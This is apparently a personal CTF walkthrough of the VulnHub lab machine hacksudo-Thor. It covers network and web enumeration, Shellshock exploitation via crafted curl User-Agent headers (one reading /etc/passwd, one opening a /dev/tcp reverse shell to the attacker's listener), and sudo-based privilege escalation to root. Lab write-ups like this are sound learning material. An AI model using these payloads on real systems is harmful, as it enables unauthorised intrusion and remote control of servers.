VULNHUB: hacksudo-Thor
Hey everyone! Welcome to my CTF walkthrough for Vulnhub’s ‘Hacksudo-Thor.’ In this guide, we’re gonna dive into Shellshock exploitation, snag a foothold, and escalate our way to root. Lessssgoo!! 🚀💥
Download Link: https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
Author: Vishal Waghmare
Difficulty: Easy
Tools : netdiscover, nmap, gobuster, dirb and netcat
Step 1: Initial Enumeration
netdiscover -r 192.168.4.0/24
After identifying the target machine ip address(192.168.4.29), we start the real enumeration using nmap
nmap -sC -sV 192.168.4.29
I am tempted to go look at ftp first, we might find interesting stuff there. But we can’t
No worries, we will get back to it later. Let’s look at the website and see if there is anything worthwhile
A simple bank web app. Tried admin admin as credentials unsuccessfully
Step 2: Web Enumeration
Let us try and enumerate directories of the web app.
gobuster dir -u http://192.168.4.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php
After typing cgi-bin/shell.sh vulnerability on google, i found out that it is a very known vulnerability called shellshock
Step 3: Foothold
I kind of wanted to exploit this vulnerability manually to gain some knowledge on the vulnerability. I got lucky enough to stumble upon this link on github https://github.com/opsxcq/exploit-CVE-2014-6271, and find this simple payload
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerableModified it to give me a reverse shell and set our netcat listener
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.4.8/9001 0>&1'" \192.168.4.29/cgi-bin/shell.sh
Hurray, we got a shell as www-data.
Step 4: Privilege Escalation to thor
Now that we have a shell, let’s try and see users in the home directory
After getting access denied, i decided to look for executables that www@data has access to using the command sudo -l
As you can see, i can execute the hammer.sh script owned by thor as www-data. I went ahead and runned the script with :
sudo -u thor /home/thor/./hammer.shand tried some random command. Apparently, we can enter any command and it will be executed. Let’s get a shell as the user thor
Let’s go into the thor directory and see what’s in there.
Apart from user.txt which is the first flag, the rest is useless.
Step 5: Privilege Escalation to root
Let’s see if there is anything thor can run as root.
thor can run cat and service. Since we can only read file, even sensitive ones like the shadow file, i looked for service on gtfobins.com and got this payload.
sudo service ../../bin/sh
Conclusion
In this machine, I discovered the Shellshock vulnerability, a previously unknown issue to me. Although it’s an older finding, there are likely still users operating the Apache version it affects. This was a valuable learning experience. Kudos to Vishal for providing us with hands-on exposure to this vulnerability.
